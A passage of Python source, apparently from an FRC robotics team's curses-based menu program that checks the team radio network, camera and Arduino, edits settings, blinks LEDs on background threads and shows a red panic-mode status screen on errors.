ArduinoFunctions.map_xi(swt1.read(), 0, 1, 0, max_v) == 0\n            ):\n                ArduinoFunctions.led_write(led_blue, led_camera, 1)  # on\n                led_green.write(0)\n\n                settings[\"Match Mode Status\"] = False\n\n                try:  # stop the blinking led if there is one\n                    if flash_led.flashthreadopen:\n                        flash_led.exitthread = True\n                except:\n                    pass\n                # save the settings before leaving\n                rv = DbFunctions.save_settings(file_s, settings)\n                handle_error(rv, stdscr, PanicMenu=True)\n\n                break\n\n    ### KERNEL PANIC ###\n    else:  # panic mode is on\n\n        try:  # stop the blinking led if there is one\n            if flash_led.flashthreadopen:\n                flash_led.exitthread = True\n        except:\n            pass\n        # preparation for checking whether an Arduino gets plugged in\n        cp_p = ArduinoFunctions.check_ports()\n        cp_c = cp_p\n\n        try:\n            led_red.write(1)  # turn the red light on\n        except:\n            pass\n\n        settings = DbFunctions.get_setting(file_s)\n\n        if handle_error(settings, stdscr, PanicMenu=False):\n            settings = {}\n\n            for i in range(len(setting_names)):\n                settings[setting_names[i]] = setting_defaults[i]  # fill the defaults into settings\n\n            f_err = True\n\n        m_menu_elements = []  # array of menu elements\n        m_menu_elements.append(\" ## PANIC MODE STARTED ## \")  # Title\n\n        # the LED is controlled by the computer; the menu just shows it\n        if settings[\"Led Status\"] is not None and settings[\"Led Status\"] in [True,False,\"True\",\"False\",]:\n            m_menu_elements.append(\" ## LED CONTROL : \" + str(settings[\"Led Status\"]) + \" ## \")\n\n        # if it cannot read on or off, report an error\n        else:\n            m_menu_elements.append(\" ## LED CONTROL FAILED ## \")\n\n            settings[\"Led Status\"] = True\n            rv = DbFunctions.save_settings(file_s, settings)  # if this fails there is nothing left to do\n            handle_error(rv, stdscr, PanicMenu=False)\n\n        if settings is not None:\n            # the rest of the menu: a status report\n            try:\n                m_menu_elements.append(\" ## TEAM_NUMBER : \" + str(settings[\"Team Number\"]) + \" ## \")\n                m_menu_elements.append(\" ## CAMERA_TOLERANCE : \" + str(settings[\"Camera Tolerance\"]) + \" ## \")\n                m_menu_elements.append(\" ## ROBOT_LOCATION : \" + str(settings[\"Robot Location\"]) + \" ## \")\n                m_menu_elements.append(\" ## WAITING_PERIOD : \" + str(settings[\"Waiting Period\"]) + \" ## \")\n                m_menu_elements.append(\" ## AUTONOMOUS_MODE : \" + str(settings[\"Autonomous Mode\"]) + \" ## \")\n                if err_type is not None:\n                    m_menu_elements.append(\" ## ERROR : \" + err_type + \" ## \")\n            except:\n                pass\n\n        errortimer = threading.Timer(0.1, print_error, args=[stdscr, errmsg])\n        errortimer.start()\n\n        while True:  # main loop\n            print_menu_for_match(stdscr, m_menu_elements)  # draw the screen\n            time.sleep(1)\n\n            if type(errmsg) == str and errmsg.startswith(\"InputP\"):  # if an error message was given\n                print_info(stdscr, errmsg, color=2)  # print it\n                errmsg = None\n\n            background_setup(stdscr, None, PanicMode=True)  # paint the background red\n\n            if type(err_type) == str and err_type == \"ARDUINO\":  # if this is an Arduino error\n                rv2 = ArduinoFunctions.check_ports()  # re-check the ports\n\n                try:\n                    if swt1.read() is None and rv2 != all_errors[ARDUINO_CONN_LOST]:  # switch unreadable but the connection is fine\n                        isReadError = True  # so it is an iterator/read error\n                    else:\n                        isReadError = False\n                except:  # the swt object does not exist\n                    if rv2 != all_errors[ARDUINO_CONN_LOST]:\n                        try:\n                            DbFunctions.save_settings()\n\n                        except:\n                            isReadError = True\n                        else:\n                            isReadError = False\n                    else:\n                        isReadError = False\n\n            # if not handle_error(rv2, stdscr, PanicMenu=False, clean=True) and not isReadError:\n            #     led_red.write(0)\n            #     not_main(stdscr)\n\n            cp_c = ArduinoFunctions.check_ports()\n            if cp_c != cp_p:  # ports differing from before means a new Arduino was plugged in\n                cp_p = cp_c\n\n                if cp_c is not None and type(cp_c) == list and type(cp_c[0]) == str and not cp_c[0] == \"\":\n                    try:\n                        led_red.write(0)\n                    except:\n                        pass\n                    not_main(stdscr)  # try importing the Arduino again\n\ndef get_first_menu_values(team_ip2):\n    # builds the values for the main menu\n    ipaddr_func = InputPFunctions.get_ipaddr()  # the currently connected IP address\n    check_cam_func = InputPFunctions.check_cam()  # whether a camera is attached\n\n    mainmenu = []\n    mainmenucheck = []\n\n    if skip_nt_arg is not None:  # skip if network checking is disabled\n        mainmenu.append(\"SKIPPED NETWORK CHECKING\")\n        mainmenucheck.append(True)\n\n    elif ipaddr_func.startswith(\"127\"):  # localhost means not connected\n        mainmenu.append(\"IP ADRESS: NOT CONNECTED\")\n        mainmenucheck.append(False)  ## False\n\n    elif not ipaddr_func.startswith(\"10.\" + team_ip2):  # connected somewhere other than the team radio\n        mainmenu.append(\"NOT CONNECTED TO RADIO\")\n        mainmenucheck.append(False)  ## False\n\n    else:  # connected successfully\n        mainmenu.append(\"IP ADRESS: \" + ipaddr_func)\n        mainmenucheck.append(True)\n\n    mainmenu.append(\"SETTINGS\")  # button for the settings menu\n    mainmenucheck.append(True)\n\n    if skip_cam_arg is not None:  # skip if camera checking is disabled\n        mainmenu.append(\"SKIPPED CAMERA CHECKING\")\n        mainmenucheck.append(True)\n\n    elif (\n        check_cam_func == \"CAMERA CONNECTED\"  # attached, or running on Windows\n        or check_cam_func == \"TRUE BECAUSE WINDOWS\"\n    ):\n        mainmenu.append(check_cam_func)  # success!\n        mainmenucheck.append(True)\n\n    else:\n        mainmenu.append(str(check_cam_func))\n        mainmenucheck.append(False)  ## False\n\n    mainmenu.append(\"LED TEST\")  # led test button\n    mainmenucheck.append(True)\n\n    mainmenu.append(\"INFO\")  # info menu button\n    mainmenucheck.append(True)\n\n    mainmenu.append(\"REBOOT\")  # reboots the machine on Linux\n    mainmenucheck.append(True)\n\n    mainmenu.append(\"EXIT\")  # exit button\n    mainmenucheck.append(True)\n\n    return [mainmenu, mainmenucheck]\n\n
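# --- illustrative sketch, not part of the original flow -----------------------
# Every get_*_menu_values function returns two parallel lists: the text rows
# and one status per row (True -> green, False -> red, anything else ->
# 'Normal'). A tiny self-check of that contract:
def _demo_menu_contract():
    menu = ['IP ADRESS: 10.78.39.2', 'SETTINGS', 'EXIT']
    status = [True, 'Normal', 'Normal']
    assert len(menu) == len(status)   # the drawing code indexes both by idx
    return [menu, status]
# -------------------------------------------------------------------------------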
def get_ip_menu_values(\n    team_ip2,\n    ipaddr_func=InputPFunctions.get_ipaddr(),  # note: this default is evaluated once at import time; callers normally pass a fresh value\n):\n    # builds the values for the ip menu\n    mainmenu = []\n    mainmenu_status = []\n\n    if skip_nt_arg is not None:  # skip if network checking is disabled\n        mainmenu.append(\" ## SKIPPED NETWORK CHECKING ## \")\n        mainmenu_status.append(False)\n\n    else:\n        mainmenu.append(\"\")\n        mainmenu_status.append(False)\n\n    mainmenu.append(\"HOSTNAME: \" + str(socket.gethostname()))  # the PC's name\n    mainmenu.append(\"IP ADRESS: \" + ipaddr_func)  # ip address\n    mainmenu.append(\"RADIO IP RANGE: 10.\" + team_ip2 + \".0/24\")\n\n    mainmenu.append(\"OK\")  # exit button\n\n    if str(socket.gethostname()) != \"frcvision\":\n        mainmenu_status[0] = False\n\n    if ipaddr_func.startswith(\"127\"):\n        mainmenu_status.append(False)\n        mainmenu_status.append(False)\n        mainmenu[2] = \"IP ADRESS: NOT CONNECTED\"\n\n    elif not ipaddr_func.startswith(\"10.\" + team_ip2):\n        mainmenu_status.append(False)\n        mainmenu_status.append(False)\n\n    else:\n        mainmenu_status.append(True)\n        mainmenu_status.append(True)\n\n    mainmenu_status.append(\"Normal\")\n    mainmenu_status.append(\"Normal\")\n\n    return [mainmenu, mainmenu_status]\n\n\ndef get_arduino_menu_values(settings):\n    mainmenu = []\n    mainmenu_status = []\n\n    # ROBOT LOCATION\n    if settings[\"Robot Location\"] is None:\n        mainmenu.append(\"INPUT FOR ROBOT LOCATION\")\n        mainmenu_status.append(False)\n\n    else:\n        mainmenu.append(\"ROBOT LOCATION: \" + settings[\"Robot Location\"])\n        mainmenu_status.append(\"Normal\")\n\n    # CAMERA TOLERANCE\n    if settings[\"Camera Tolerance\"] is None:\n        mainmenu.append(\"INPUT FOR CAMERA TOLERANCE\")\n        mainmenu_status.append(False)\n\n    else:\n        mainmenu.append(\"CAMERA TOLERANCE: \" + settings[\"Camera Tolerance\"])\n        mainmenu_status.append(\"Normal\")\n\n    # WAITING PERIOD\n    if settings[\"Waiting Period\"] is None:\n        mainmenu.append(\"INPUT FOR WAITING PERIOD\")\n        mainmenu_status.append(False)\n\n    else:\n        mainmenu.append(\"WAITING PERIOD: \" + settings[\"Waiting Period\"])\n        mainmenu_status.append(\"Normal\")\n\n    # AUTONOMOUS MODE\n    if settings[\"Autonomous Mode\"] is None:\n        mainmenu.append(\"INPUT FOR AUTONOMOUS MODE\")\n        mainmenu_status.append(False)\n    else:\n        mainmenu.append(\"AUTONOMOUS MODE: \" + settings[\"Autonomous Mode\"])\n        mainmenu_status.append(\"Normal\")\n\n    if settings[\"Camera Offset\"] is None:\n        mainmenu.append(\"INPUT FOR CAMERA OFFSET\")\n        mainmenu_status.append(False)\n    else:\n        mainmenu.append(\"CAMERA OFFSET: mm\")  # the three digits are drawn into the gap by print_cam_offset_edit\n        mainmenu_status.append(\"Normal\")\n\n    # mainmenu.append(\"\")\n    mainmenu.append(\"TEAM NUMBER: \")  # the four digits are drawn next to this by print_team_no_edit\n    mainmenu_status.append(True)\n\n    # WRITE CURRENT SETTINGS AND OK BUTTONS\n    mainmenu.append(\"WRITE CURRENT SETTINGS TO FILE\")\n    mainmenu_status.append(\"Normal\")\n\n    mainmenu.append(\"RETURN TO MAIN MENU\")\n    mainmenu_status.append(False)\n\n    return [mainmenu, mainmenu_status]\n\n\ndef get_cam_menu_values(isCamOnline=InputPFunctions.check_cam()):  # note: default evaluated once at import time\n    mainmenu = []\n    mainmenu_status = []\n\n    # # FIRST ELEMENT (NETWORK TABLES)\n    # if msg:\n    #     mainmenu.append(\"NETWORK TABLES CONNECTED\")\n    #     mainmenu_status.append(True)\n    # if not msg:\n    #     mainmenu.append(\"NETWORK TABLES NOT CONNECTED\")\n    #     mainmenu_status.append(False)\n    # else:\n    #     mainmenu.append(\"CAMERA NOT STARTED\")\n    #     mainmenu_status.append(False)\n\n    # SECOND ELEMENT (IS CAM ONLINE)\n    if isCamOnline:\n        mainmenu.append(\"CAMERA CONNECTED\")\n        mainmenu_status.append(True)\n\n    if not isCamOnline:\n        mainmenu.append(\"CAMERA NOT CONNECTED\")\n        mainmenu_status.append(False)\n\n    # OK BUTTON\n    mainmenu.append(\"OK\")\n    mainmenu_status.append(\"Normal\")\n\n    return [mainmenu, mainmenu_status]\n\n\ndef get_info_menu_values(teamnumber):\n    menu = []\n    menucheck = []\n\n    menu.append(\"MADE FOR FRC 2020 SEASON\")\n    menucheck.append(True)\n\n    menu.append(\"TUNAPRO1234\")\n    menucheck.append(True)\n\n    menu.append(\"ColonelKai\")\n    menucheck.append(True)\n\n    menu.append(\"BlackShadow\")\n    menucheck.append(False)\n\n    menu.append(\"NICE\")\n    menucheck.append(True)\n\n    return [menu, menucheck]\n\n\ndef print_info(stdscr, input_str, color=3):\n    errortimer = threading.Timer(0.1, print_error, args=[stdscr, input_str, color])\n    errortimer.start()\n\n\ndef print_error(stdscr, cur_stat, color=2, wait_time=5):\n    # draws the given error message at the bottom of the screen for wait_time seconds (usually 5)\n    starttime = time.perf_counter()  # start time\n    while True:\n        if type(cur_stat) == str:  # the message was passed directly, draw it as-is\n            errmsg = cur_stat\n            if errmsg is not None:\n                h, w = stdscr.getmaxyx()\n                x = w // 2 - (len(errmsg) + 1) // 2\n                y = h - 1\n                stdscr.attron(curses.color_pair(color))\n                stdscr.addstr(y, x, errmsg)\n                stdscr.attroff(curses.color_pair(color))\n                stdscr.refresh()\n\n        elif cur_stat is not None:  # a dict was passed, pull the message out of it\n            errmsg = cur_stat[\"current_error\"]\n\n            if errmsg is not None:\n                h, w = stdscr.getmaxyx()\n                x = w // 2 - (len(errmsg) + 1) // 2\n                y = h - 1\n                stdscr.attron(curses.color_pair(2))\n                stdscr.addstr(y, x, errmsg)\n                stdscr.attroff(curses.color_pair(2))\n                stdscr.refresh()\n\n        elif cur_stat is None:  # otherwise draw an empty string\n            h, w = stdscr.getmaxyx()\n            x = (w // 2) - (1 // 2)\n            y = h - 1\n            stdscr.attron(curses.color_pair(2))\n            stdscr.addstr(y, x, \"\")\n            stdscr.attroff(curses.color_pair(2))\n            stdscr.refresh()\n        timenow = time.perf_counter()  # stop once the given time has passed\n        if timenow - starttime > wait_time:\n            break\n\n
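# --- illustrative sketch, not part of the original flow -----------------------
# The digit editors below all centre text with the same arithmetic that the
# menu printers use; factored out it is just:
def _centered_x(screen_width, text):
    return screen_width // 2 - (len(text) + 1) // 2
# e.g. _centered_x(80, 'HELLO') == 37
# -------------------------------------------------------------------------------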
def print_cam_offset_edit(stdscr, team_n, cam_offset_pos, cur_stat):\n    # lets the settings menu edit the three digits of the camera offset one by\n    # one (team_n holds the digit string; the name is a leftover from the\n    # team-number editor this was copied from)\n    if cam_offset_pos is not None:\n        h, w = stdscr.getmaxyx()  # screen height and width\n\n        for idx, i in enumerate(team_n):\n            y = h // 2  # vertical centre of the screen\n            # the three digits sit just right of centre; the original computed\n            # x = w // 2, then x -=- 1, then added 4/5/6 per digit\n            x = w // 2 + 5 + idx\n\n            if cur_stat[\"current_menu\"] == arduino_menu_value:  # only in the settings menu\n                # the selected digit is drawn white, the rest in the normal colour\n                pair = 1 if cam_offset_pos == idx else 3\n                stdscr.attron(curses.color_pair(pair))\n                stdscr.addstr(y, x, i)\n                stdscr.attroff(curses.color_pair(pair))\n\n        # this part was removed\n        x = w // 2 - 9\n        stdscr.attron(curses.color_pair(3))\n        # stdscr.addstr(y, x, \"TEAM NUMBER: \")\n        stdscr.attroff(curses.color_pair(3))\n\n        stdscr.refresh()  # refresh the screen\n\n\ndef print_team_no_edit(stdscr, team_n, team_no_select, cur_stat):\n    # same idea as print_cam_offset_edit, just one row lower and four digits wide\n    if team_no_select is not None:\n        h, w = stdscr.getmaxyx()\n        for idx, i in enumerate(team_n):\n            y = h // 2 + 1  # one row below centre (the original wrote y -=- 1)\n            x = w // 2 + 4 + idx  # digits at +4 .. +7\n\n            if cur_stat[\"current_menu\"] == arduino_menu_value:\n                pair = 1 if team_no_select == idx else 3\n                stdscr.attron(curses.color_pair(pair))\n                stdscr.addstr(y, x, i)\n                stdscr.attroff(curses.color_pair(pair))\n\n        x = w // 2 - 9\n        stdscr.attron(curses.color_pair(3))\n        # stdscr.addstr(y, x, \"TEAM NUMBER: \")\n        stdscr.attroff(curses.color_pair(3))\n\n        stdscr.refresh()\n\n\ndef check_arduino_thread():\n    global check_arduino_thread_rv\n    # keeps checking in the background whether the Arduino is still attached\n    # note: threaded code started dissolving my brain\n    check_arduino_thread.exitthread = False  # set this True anywhere in the code to stop the thread\n\n    # the function that runs on the thread\n    def check_arduino_thread_actual():\n        global check_arduino_thread_rv\n        check_arduino_thread.threadopen = True  # mark the thread open so a second one is not started\n        check_arduino_thread.exitthread = False  # make sure no stop order is pending\n        while True:  # main loop\n            rv = ArduinoFunctions.check_ports()  # scan the ports\n            try:\n                if type(rv) == list and (rv[0] is None or rv[0] == \"\"):  # empty list: not found\n                    check_arduino_thread_rv = False\n\n                elif type(rv) == str and rv.startswith(\"InputP\"):  # check_ports returned an error\n                    check_arduino_thread_rv = False\n\n                elif type(rv) == list and rv[0] is not None and type(rv[0]) == str and not rv[0] == \"\":  # found\n                    check_arduino_thread_rv = True\n\n            except:  # any error counts as not found\n                check_arduino_thread_rv = False\n\n            # check for a stop order\n            if check_arduino_thread.exitthread:\n                check_arduino_thread.exitthread = False\n                break\n\n            time.sleep(1)  # wait so the thread does not hog the CPU\n\n        check_arduino_thread.threadopen = False  # mark the thread closed once the loop exits\n\n\n\n\n    # the code that starts the thread\n    # a Timer is used because I did not yet know how threading worked when writing this\n    try:\n        if not check_arduino_thread.threadopen:  # only start if no thread is already open\n            arduino_check_timer = threading.Timer(0.1, check_arduino_thread_actual, [])\n            arduino_check_timer.start()\n    except:  # threadopen is not set yet on the first call, so just start one\n        arduino_check_timer = threading.Timer(0.1, check_arduino_thread_actual, [])\n        arduino_check_timer.start()\n\n\ndef flash_led(led):\n    # given a led object, blinks it until a stop order arrives\n    # the rest works exactly like check_arduino_thread()\n    flash_led.exitthread = False\n    def flash_led_actual(led):\n        flash_led.flashthreadopen = True\n        while True:\n            time.sleep(0.5)\n            ArduinoFunctions.led_write(led, None, 1)\n            time.sleep(0.5)\n            ArduinoFunctions.led_write(led, None, 0)\n            if flash_led.exitthread:\n                break\n        flash_led.flashthreadopen = False\n\n    try:\n        if not flash_led.flashthreadopen:\n            flash_timer = threading.Timer(0.1, flash_led_actual, [led])\n            flash_timer.start()\n    except:\n        flash_timer = threading.Timer(0.1, flash_led_actual, [led])\n        flash_timer.start()\n\n
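# --- illustrative sketch, not part of the original flow -----------------------
# check_arduino_thread and flash_led share one pattern: a background loop that
# polls until a function attribute is flipped. The generic shape, for reference
# (threading and time are already imported above):
def _run_until_stopped(step, interval=0.5):
    _run_until_stopped.exitthread = False
    def _loop():
        while not _run_until_stopped.exitthread:
            step()                      # the work to repeat
            time.sleep(interval)        # pace the loop
    threading.Thread(target=_loop, daemon=True).start()
# usage: _run_until_stopped(lambda: None); later _run_until_stopped.exitthread = True
# -------------------------------------------------------------------------------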
def print_current_menu(stdscr, cur_stat, led_blue = None, led_camera = None):\n    # draws every menu apart from the special cases (panic mode, match mode);\n    # needs the curses screen object and cur_stat carrying the menu elements\n    global match_mode_can_be_started  # the assignments below otherwise create a local that never leaves this function\n    firsttime = True\n\n    if type(cur_stat[\"current_menu_elements\"][0]) is list:  # if the element list got nested inside another list\n        cur_stat[\"current_menu_elements\"] = cur_stat[\"current_menu_elements\"][0]  # unwrap it\n\n    stdscr.clear()  # clear the screen\n    h, w = stdscr.getmaxyx()  # screen height and width\n\n    for idx, row in enumerate(cur_stat[\"current_menu_elements\"]):  # walk every menu element\n        if cur_stat[\"current_menu_status\"][idx] is True:  # True -> green\n            colornumber = 3\n\n        elif cur_stat[\"current_menu_status\"][idx] is False:  # False -> red\n            colornumber = 2\n\n        else:  # anything else (e.g. 'Normal') -> normal; a plain truthiness test would paint these green\n            colornumber = 4\n\n        x = w // 2 - (len(row) + 1) // 2  # position from the row length\n        y = h // 2 - (len(cur_stat[\"current_menu_elements\"]) + 1) // 2 + idx\n\n        if idx == cur_stat[\"current_row\"]:  # the selected row is drawn white\n            stdscr.attron(curses.color_pair(1))\n            stdscr.addstr(y, x, row)\n            stdscr.attroff(curses.color_pair(1))\n\n        else:  # otherwise in its own colour\n            stdscr.attron(curses.color_pair(colornumber))\n            stdscr.addstr(y, x, row)\n            stdscr.attroff(curses.color_pair(colornumber))\n\n        if firsttime:  # remember the row above the first element\n            firsty = y - 1\n            firsttime = False\n        elif not firsttime:\n            pass\n\n    for i in cur_stat[\"all_menu_elements\"][main_menu_value][1]:  # scan every main-menu status\n        if i:\n            match_message = \" ## MATCH MODE CAN BE STARTED ## \"\n            match_message_color = 4\n            if not led_blue is None and not led_camera is None:\n                ArduinoFunctions.led_write(led_blue, led_camera, 1)\n            match_mode_can_be_started = True\n        else:\n            match_message = \" ## MATCH MODE CANNOT BE STARTED ## \"\n            match_message_color = 2\n            if not led_blue is None:\n                match_mode_can_be_started = False\n                flash_led(led_blue)\n            break\n\n    # if every status is True match mode can be started; a single False blocks it\n\n    firstx = w // 2 - (len(match_message) + 1) // 2\n\n    stdscr.attron(curses.color_pair(match_message_color))\n    stdscr.addstr(firsty - 1, firstx, match_message)\n    stdscr.attroff(curses.color_pair(match_message_color))\n\n    teamname = \"FRC7839 \"  # draw our name in the top right corner\n    namex = w - len(teamname)\n    namey = 0\n\n    stdscr.attron(curses.color_pair(3))\n    stdscr.addstr(namey, namex, teamname)\n    stdscr.attroff(curses.color_pair(3))\n\n    stdscr.refresh()  # refresh the screen\n\n\ndef print_menu_for_match(stdscr, m_menu_elements):\n    stdscr.clear()  # clear the screen\n    h, w = stdscr.getmaxyx()  # screen height and width\n\n    for idx, row in enumerate(m_menu_elements):  # for every given row\n        x = w // 2 - (len(row) + 1) // 2  # x and y calculations\n        y = h // 2 - (len(m_menu_elements) + 1) // 2 + idx\n\n        stdscr.attron(curses.color_pair(4))  # draw it\n        stdscr.addstr(y, x, row)\n        stdscr.attroff(curses.color_pair(4))\n\n    stdscr.refresh()  # refresh the screen\n\n\ndef cursor_handler(key, cur_stat):\n    # moves the cursor down a menu, wrapping back to the top at the bottom\n    # cursor down\n    current_row = cur_stat[\"current_row\"]\n\n    if (key == \"button1\") and (\n        current_row < (len(cur_stat[\"current_menu_elements\"]) - 1)\n    ):\n\n        current_row += 1\n\n    # cursor wrap (jump back to the very top)\n    elif (\n        current_row == (len(cur_stat[\"current_menu_elements\"]) - 1) and key == \"button1\"\n    ):\n\n        current_row = 0\n\n    return current_row\n\n\ndef set_current_menu(cur_stat, all_menu_elements):\n    cur_menu = int(cur_stat[\"current_menu\"])\n\n    cur_stat[\"current_menu_elements\"] = all_menu_elements[cur_menu][0]\n    cur_stat[\"current_menu_status\"] = all_menu_elements[cur_menu][1]\n\n    return cur_stat[\"current_menu_elements\"], cur_stat[\"current_menu_status\"]\n\n\ndef return_to_menu(key, cur_stat, stdscr):\n    # pressing the bottom row of any menu returns to the main menu\n    # back to the main menu\n    settings = None\n    if (\n        (key == \"button0\")\n        and cur_stat[\"current_menu\"] != 0\n        and cur_stat[\"current_row\"] == (len(cur_stat[\"current_menu_elements\"]) - 1)\n    ):\n        cur_stat[\"current_row\"] = 0\n        cur_stat[\"current_menu\"] = 0\n\n        settings = DbFunctions.get_setting(file_s)\n        handle_error(settings, stdscr, PanicMenu=True)\n\n    # in the settings menu, the write-settings button also returns to the main menu\n    if (\n        (key == \"button0\")\n        and cur_stat[\"current_menu\"] == arduino_menu_value\n        and cur_stat[\"current_row\"] == (len(cur_stat[\"current_menu_elements\"]) - 2)\n    ):\n        cur_stat[\"current_row\"] = 0\n        cur_stat[\"current_menu\"] = 0\n\n        settings = DbFunctions.get_setting(file_s)\n        handle_error(settings, stdscr, PanicMenu=True)\n\n    return cur_stat[\"current_row\"], cur_stat[\"current_menu\"], settings\n\n\ndef background_setup(stdscr, cur_stat=None, PanicMode=False):\n    bruh = None\n    # paints the background green while every status in the menu is True, red otherwise\n    if PanicMode == True:\n        stdscr.bkgd(\" \", curses.color_pair(2))  # the curses call that sets the background\n\n    elif cur_stat is not None and cur_stat[\"current_menu\"] == 0:\n        for i in cur_stat[\"current_menu_status\"]:\n            if i:\n                stdscr.bkgd(\" \", curses.color_pair(3))\n                bruh = 1\n\n            elif not i:\n                bruh = 0\n                stdscr.bkgd(\" \", curses.color_pair(2))\n                break\n\n        if bruh is not None and bruh == 1:\n            flash_led.exitthread = True\n\n\n    elif cur_stat is not None and cur_stat[\"current_menu\"] != 0:\n        stdscr.bkgd(\" \", curses.color_pair(4))\n\n\ndef refresh_screen(stdscr, key, team_no_pos, cam_offset_pos, cur_stat, settings, team_ip2, led_blue = None, led_camera = None):\n    # applies any screen changes and draws the menu again\n    new_all_menu_elements = cur_stat[\"all_menu_elements\"]\n\n    new_all_menu_elements[main_menu_value] = get_first_menu_values(team_ip2)  # refresh the main menu values\n    new_all_menu_elements[ip_menu_value] = get_ip_menu_values(  # refresh the ip menu values\n        team_ip2, InputPFunctions.get_ipaddr()  # re-check the ip address\n    )\n    new_all_menu_elements[arduino_menu_value] = get_arduino_menu_values(settings)  # refresh the settings menu values\n    new_all_menu_elements[camera_menu_value] = get_cam_menu_values()  # refresh the camera menu values\n\n    # background\n    background_setup(stdscr, cur_stat)\n\n    # with the background set, draw the menu\n    print_current_menu(stdscr, cur_stat, led_blue, led_camera)\n\n    # team-number digits for the settings menu\n    print_team_no_edit(stdscr, settings[\"Team Number\"], team_no_pos, cur_stat)\n\n    # camera-offset digits for the settings menu\n    print_cam_offset_edit(stdscr, settings[\"Camera Offset\"], cam_offset_pos, cur_stat)\n\n    return new_all_menu_elements\n\n\n# region\n\n# def handle_errors(stdscr=None, PanicMenu=True, *args):\n#     for variable in args:\n#         if type(variable) == str:\n#             if str(variable).startswith(\"InputP\"):\n#                 background_setup(stdscr, None, PanicMode=True)\n\n#                 if test_mode is not None:\n#                     raise Exception(str(variable))\n\n#                 else:\n#                     if PanicMenu:\n#                         match_mode(stdscr, PanicMenu=True, errmsg=variable)\n#                     else:\n#                         print_info(stdscr, variable, color=2, time=5)\n#                 return True\n#         else:\n#             return False\n\n# endregion\n\n\ndef handle_error(err_msg, stdscr=None, PanicMenu=True, clean=False):\n    # checks whether a given value is an error\n    # with PanicMenu enabled, spotting an error drops the program into panic mode\n    if type(err_msg) == str:  # if the given value is a string\n        if str(err_msg).startswith(\"InputP\"):  # and it is an error\n            err_type = None\n\n            # work out the error type\n            if err_msg in [all_errors[READ_ERR], all_errors[WRITE_ERR]]:\n                err_type = \"FILE\"\n\n            elif err_msg in [\n                all_errors[ARDUINO_CONN_ERR],\n                all_errors[ARDUINO_CONN_LOST],\n                all_errors[ARDUINO_INPUT_ERR],\n            ]:\n                err_type = \"ARDUINO\"\n\n            background_setup(stdscr, None, PanicMode=True)  # paint the background red\n\n            if test_mode is not None:  # with test mode on, raise instead of entering panic mode\n                raise Exception(str(err_msg))\n\n            else:\n                if PanicMenu:  # enter panic mode\n                    match_mode(\n                        stdscr, PanicMenu=True, errmsg=err_msg, err_type=err_type\n                    )\n\n                else:  # otherwise only print the error message at the bottom of the screen\n                    if not clean:\n                        print_info(stdscr, err_msg, color=2)\n\n            return True  # it was an error, so return True\n\n        else:  # not an error\n            return False\n\n\ndef set_tip(team_number):\n    # turns the team number into the 'TE.AM' fragment of the radio IP to check against\n    team_ip2 = team_number\n\n    if len(team_ip2) == 3:\n        team_ip2 = team_ip2[0] + \".\" + team_ip2[1:]  # e.g. '254' -> '2.54'; zero-padding this can never match a dotted quad like 10.2.54.x\n\n    elif len(team_ip2) == 4:\n        team_ip2 = team_ip2[0:2] + \".\" + team_ip2[2:]  # e.g. '7839' -> '78.39'\n\n    return team_ip2\n\n
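# --- illustrative check, not part of the original flow ------------------------
# set_tip maps a team number onto the middle octets of the radio's 10.TE.AM.x
# network:
assert set_tip('7839') == '78.39'  # radio network 10.78.39.0/24
assert set_tip('254') == '2.54'    # radio network 10.2.54.0/24
# -------------------------------------------------------------------------------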
def not_main(stdscr):\n    flash_led.exitthread = True\n    # region setup before the main while loop\n\n    # region settings read\n    settings = DbFunctions.get_setting(file_s)\n    handle_error(settings, stdscr, PanicMenu=True)\n    # endregion\n\n    team_ip2 = set_tip(settings[\"Team Number\"])  # derive the radio ip from the team number\n\n    all_menu_elements = []  # gather the elements of every menu\n    all_menu_elements.append(get_first_menu_values(team_ip2))\n    all_menu_elements.append(get_ip_menu_values(team_ip2, InputPFunctions.get_ipaddr()))\n    all_menu_elements.append(get_arduino_menu_values(settings))\n    all_menu_elements.append(get_cam_menu_values(None))\n    all_menu_elements.append(get_info_menu_values(None))\n\n    # cursor position\n    current_row = 0\n    # active menu\n    current_menu = 0\n    # elements of the active menu\n    current_menu_elements = all_menu_elements[0][0]\n    # colour values of the active menu's elements\n    current_menu_status = all_menu_elements[0][1]\n\n    cur_stat = {\n        \"current_row\": current_row,\n        \"current_menu\": current_menu,\n        \"current_menu_elements\": current_menu_elements,\n        \"current_menu_status\": current_menu_status,\n        \"all_menu_elements\": all_menu_elements,\n    }\n\n    # COLOURS\n    # 2 = RED\n    # 3 = GREEN\n    # 4 = NORMAL\n\n    # region curses colour setup\n    curses.curs_set(0)\n    curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_WHITE)\n    curses.init_pair(2, curses.COLOR_WHITE, curses.COLOR_RED)\n    curses.init_pair(3, curses.COLOR_WHITE, curses.COLOR_GREEN)\n    curses.init_pair(4, curses.COLOR_WHITE, curses.COLOR_BLACK)\n\n    # endregion\n\n    # port 5802 is what we use to tell whether the code is running,\n    # and port 5803 is where the led on/off info is written\n\n    # endregion\n\n    team_no_pos = 9\n    cam_offset_pos = 9\n    msg = None\n    key = None\n\n\n    # draw the screen\n    refresh_screen(stdscr, key, team_no_pos, cam_offset_pos, cur_stat, settings, team_ip2)\n\n    # time.sleep(1)\n    # region arduino import\n\n    # show an importing message while the Arduino comes up\n    # board = pyfirmata.ArduinoNano(\"COM4\")\n    errortimer = threading.Timer(0.1, print_error, args=[stdscr, \"InputP: Importing Arduino...\", 3])\n    errortimer.start()\n\n\n    # take the current time so the elapsed import time can be measured later\n    start_t = timeit.default_timer()\n    ###\n\n    com_ports = ArduinoFunctions.check_ports()  # read the com ports\n    time.sleep(1)\n    if type(com_ports) == list:  # something is attached to the com ports\n        board = ArduinoFunctions.import_arduino(com_ports)  # import the Arduino\n\n    else:  # otherwise raise the error\n        board = all_errors[ARDUINO_CONN_ERR]\n\n    ###\n    # measure the elapsed time\n    elapsed = timeit.default_timer() - start_t\n\n    # if it took less than 5 seconds, pad it out to 5 (it usually takes much longer)\n    if elapsed < 5:\n        time.sleep(5 - elapsed)\n    # error message\n    # errortimer = threading.Timer(0.1, print_error, args=[stdscr, None])\n    # errortimer.start()\n\n    # if the Arduino imported successfully\n    if not type(board) == str:\n\n        # swt1 = board.get_pin(\"a:1:i\")\n        # pot1 = board.get_pin(\"a:2:i\")\n        # inp1 = board.get_pin(\"a:6:i\")\n        # led_camera = board.get_pin(\"d:10:p\")\n        # but1 = board.get_pin(\"d:2:i\")\n        # but2 = board.get_pin(\"d:7:i\")\n        # led1 = board.get_pin(\"d:11:p\")\n\n        # definitions of all the Arduino pins\n\n\n        pot1 = board.get_pin(pot1_str)\n        swt1 = board.get_pin(swt1_str)\n     